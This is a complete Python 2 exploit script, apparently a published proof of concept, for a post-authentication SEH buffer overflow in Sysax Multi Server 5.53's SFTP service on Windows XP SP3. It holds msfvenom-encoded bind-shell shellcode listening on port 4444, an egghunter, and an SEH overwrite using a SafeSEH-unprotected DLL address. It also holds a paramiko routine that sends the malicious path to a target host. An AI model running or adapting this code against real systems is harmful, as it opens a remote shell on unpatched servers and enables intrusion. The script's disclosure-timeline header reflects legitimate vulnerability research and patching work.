#!/usr/bin/python ########################################################################################################## #Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter) #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit #Software Versions Tested: 5.53 #Date Discovered: Febrary 22, 2012 #Vendor Contacted: Febrary 23, 2012 #Vendor Response: February 27, 2012 #Vendor Fix: Version 5.55 #Notes: Offset based on home path length. This exploit works for C:\AAAAAAAAAAAAAAAA #Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html ########################################################################################################## import paramiko,os,sys if len(sys.argv) != 5: print "[+] Usage: ./filename " sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) username = sys.argv[3] password = sys.argv[4] transport = paramiko.Transport((host, port)) transport.connect(username = username, password = password) sftp = paramiko.SFTPClient.from_transport(transport) # msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "\x00" -e x86/shikata_ga_nai shell = ("DNWPDNWP" "\xdb\xd9\xba\xf9\x77\x28\x1b\xd9\x74\x24\xf4\x5e\x29\xc9" "\xb1\x56\x31\x56\x18\x83\xee\xfc\x03\x56\xed\x95\xdd\xe7" "\xe5\xd3\x1e\x18\xf5\x83\x97\xfd\xc4\x91\xcc\x76\x74\x26" "\x86\xdb\x74\xcd\xca\xcf\x0f\xa3\xc2\xe0\xb8\x0e\x35\xce" "\x39\xbf\xf9\x9c\xf9\xa1\x85\xde\x2d\x02\xb7\x10\x20\x43" "\xf0\x4d\xca\x11\xa9\x1a\x78\x86\xde\x5f\x40\xa7\x30\xd4" "\xf8\xdf\x35\x2b\x8c\x55\x37\x7c\x3c\xe1\x7f\x64\x37\xad" "\x5f\x95\x94\xad\x9c\xdc\x91\x06\x56\xdf\x73\x57\x97\xd1" "\xbb\x34\xa6\xdd\x36\x44\xee\xda\xa8\x33\x04\x19\x55\x44" "\xdf\x63\x81\xc1\xc2\xc4\x42\x71\x27\xf4\x87\xe4\xac\xfa" "\x6c\x62\xea\x1e\x73\xa7\x80\x1b\xf8\x46\x47\xaa\xba\x6c" "\x43\xf6\x19\x0c\xd2\x52\xcc\x31\x04\x3a\xb1\x97\x4e\xa9" "\xa6\xae\x0c\xa6\x0b\x9d\xae\x36\x03\x96\xdd\x04\x8c\x0c" "\x4a\x25\x45\x8b\x8d\x4a\x7c\x6b\x01\xb5\x7e\x8c\x0b\x72" "\x2a\xdc\x23\x53\x52\xb7\xb3\x5c\x87\x18\xe4\xf2\x77\xd9" "\x54\xb3\x27\xb1\xbe\x3c\x18\xa1\xc0\x96\x2f\xe5\x0e\xc2" "\x7c\x82\x72\xf4\x93\x0e\xfa\x12\xf9\xbe\xaa\x8d\x95\x7c" "\x89\x05\x02\x7e\xfb\x39\x9b\xe8\xb3\x57\x1b\x16\x44\x72" "\x08\xbb\xec\x15\xda\xd7\x28\x07\xdd\xfd\x18\x4e\xe6\x96" "\xd3\x3e\xa5\x07\xe3\x6a\x5d\xab\x76\xf1\x9d\xa2\x6a\xae" "\xca\xe3\x5d\xa7\x9e\x19\xc7\x11\xbc\xe3\x91\x5a\x04\x38" "\x62\x64\x85\xcd\xde\x42\x95\x0b\xde\xce\xc1\xc3\x89\x98" "\xbf\xa5\x63\x6b\x69\x7c\xdf\x25\xfd\xf9\x13\xf6\x7b\x06" "\x7e\x80\x63\xb7\xd7\xd5\x9c\x78\xb0\xd1\xe5\x64\x20\x1d" "\x3c\x2d\x50\x54\x1c\x04\xf9\x31\xf5\x14\x64\xc2\x20\x5a" "\x91\x41\xc0\x23\x66\x59\xa1\x26\x22\xdd\x5a\x5b\x3b\x88" "\x5c\xc8\x3c\x99") egghunter = ( "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd" "\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x4e\x57\x50" "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") nseh = "\x90\x90\xeb\x08" junk = "A" * 256 padding = "B" * (256 -len(junk) - len(shell)) seh = "\xA1\x47\x92\x5D" #5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected *** remotepath = junk + nseh + seh + "\x90" * 10 + egghunter + "\x90" * 1000 + shell + "\x90" * 100 localpath = '/tmp/system.log' print "============================================================================" print " Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter) " print " by cd1zz " print " www.pwnag3.com " print " Launching exploit against " + host + " on port " + str(port) + " for XP" print "============================================================================" sftp.get(remotepath, localpath) sftp.close() transport.close()